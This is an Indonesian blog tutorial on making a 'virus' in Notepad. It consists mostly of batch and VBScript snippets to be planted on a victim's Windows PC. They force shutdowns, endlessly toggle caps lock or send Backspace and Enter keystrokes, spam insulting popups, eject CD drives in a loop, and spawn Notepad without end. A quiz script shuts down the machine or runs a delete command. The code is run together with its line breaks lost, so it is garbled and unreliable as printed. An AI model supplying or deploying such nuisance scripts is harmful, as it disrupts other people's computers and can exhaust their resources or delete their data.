cara membuat virus Via notepad

Halo sobat blogger!!
Pada pertemuan kali ini saya akan membahas tentang virus,
Saya akan membuat virus dengan notepad,Tentunya jangan disalah gunakan
Langsung saja ke tutorial nya

1.Membuat komputer Forced Shutdown

@echo offmsg * I don't like youshutdown -c "Error! You are too ******!" -s

Copy dan paste Kode tersebut di notepad dengan nama FS.bat type file : all files

2.Membuat tombol capslock menyala terus

Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{CAPSLOCK}"loop
Copy dan paste kode tersebut ke notepad dengan nama CS.vbs type file : all files

3.Membuat pesan jail muncul terus

@ECHO off:Beginmsg * muka kamu sangat jelekmsg * ngaca dulu gih, msg * hayo lo,cpu lu gw acak acakmsg * udah install ulang ajamsg * biar masalah nya kelarGOTO BEGIN

Copy dan paste kode tersebut ke notepad dengan nama pesan.bat type file : all files

4.Membuka CD rom terus menerus

Set oWMP = CreateObject("WMPlayer.OCX.7")Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextEnd Ifwscript.sleep 5000loop
Copy dan paste kode tersebut ke notepad dengan nama CD.vbs type file : all files

5.membuat Script muncul terus menerus

Set wshShell = wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "~(enter)"loop
Copy dan paste kode tersebut ke notepad dengan nama Sct.vbs type file : all files

6.Membuat tombol backspace eror 

MsgBox "kembali ke menu sebelumnya"Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{bs}"loop

Copy dan paste kode tersebut ke notepad dengan nama BS.vbs type file : all files

7.Cara membuat notepad terus menerus membuka


@ECHO off:topSTART %SystemRoot%\system32\notepad.exeGOTO top
Copy dan paste kode tersebut ke notepad dengan nama ND.bat type file : all files

8.Cara membuat kuis di notepad

@echo offtitle quiz hari ini :):menuclsecho jika kamu kena virus apayang kamu lakukanpauseecho pilih yang mana:echo 1. matiin computerecho 2. format ajaecho 3. bingung ahhset input=nothingset /p input=Choice:if %input%==1 shutdown -s -t30if %input%==2 del c:xxxif %input%==3 @ECHO offmsg * muka lo rusakmsg * ngaca dulu gihmsg * hayo lo,cpu lu gw acak2msg * ud install ulang ajamsg * biar masalah nya kelar@ECHO off:topSTART %SystemRoot%system32notepad.exeGOTO top
Copy dan paste kode tersebut ke notepad dengan nama KUIS.bat type file : all files

Segitu aja yak? :v
Dah segitu aja yang saya bisa bagikan ke kalian
Tentu nya cara di atas sangat jail hahaha

Jangan lupa join site dan komentar
Kunjungi terus (y)

Posting Komentar

Lebih baru Lebih lama